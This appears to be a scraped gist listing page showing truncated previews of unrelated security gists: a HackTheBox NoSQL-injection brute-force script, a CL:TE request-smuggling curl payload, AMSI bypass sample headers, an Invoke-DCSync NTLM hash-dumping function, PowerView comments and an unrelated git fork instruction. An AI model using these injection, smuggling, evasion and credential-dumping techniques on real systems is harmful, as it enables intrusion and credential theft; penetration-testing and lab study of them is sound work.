Collection of BloodHound Cypher Query Examples
- I- Raw
- II- Built-In
- III- Custom
- IV- DB Manipulation
- V- REST API (PowerShell)
Collection of BloodHound Cypher Query Examples
import sys | |
from impacket_rdpcheck import check_rdp as imp_checkrdp | |
import impacket_rdpcheck_original as imp_checkrdp_orig | |
from argparse import ArgumentParser | |
from pypsrp.client import Client | |
from impacket import tds | |
from sys import stdout | |
from os import path | |
from cme import crackmapexec |
import bz2 | |
import csv | |
import io | |
import os | |
import tarfile | |
import requests | |
import argparse | |
from termcolor import colored | |
The repository for the assignment is public and Github does not allow the creation of private forks for public repositories.
The correct way of creating a private frok by duplicating the repo is documented here.
For this assignment the commands are:
git clone --bare git@github.com:usi-systems/easytrace.git
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
#ippsec's Mango HTB mongo DB brute force script | |
import requests | |
def inject(data): | |
r = requests.post('http://staging-order.mango.htb/', data=data, allow_redirects=False) | |
if r.status_code != 200: | |
return True | |
#can add prefixes to secret to pretext where the brute-force begins | |
secret = "" | |
payload = "" |
#CL:TE -- Standard CL and TE | |
curl -i -s -k -X $'POST' \ | |
-H $'Host: subdomain1.joe.pr.qing-wen.com/' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \ | |
--data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost: subdomain1.joe.pr.qing-wen.com/\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \ | |
$'https://subdomain1.j |
'################################################################################## | |
' Code samples for AMSI bypass techniques | |
' relating to the blogpost on AMSI bypasses on https://outflank.nl/blog/ | |
'################################################################################## | |
' ################################################################################## | |
' AMSI Bypass approach that abuses trusted locations (sample for Word) | |
' ################################################################################## |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
# From https://wald0.com/?p=14 | |
# Requires PowerView | |
$Graph = @() | |
$Infinity = [int]::MaxValue | |
$Nodes = Get-NetUser | ForEach-Object { $_.samaccountname } | |
$Nodes += Get-NetComputer | |
ForEach($Node in $Nodes){ | |
$Vertex = New-Object PSObject |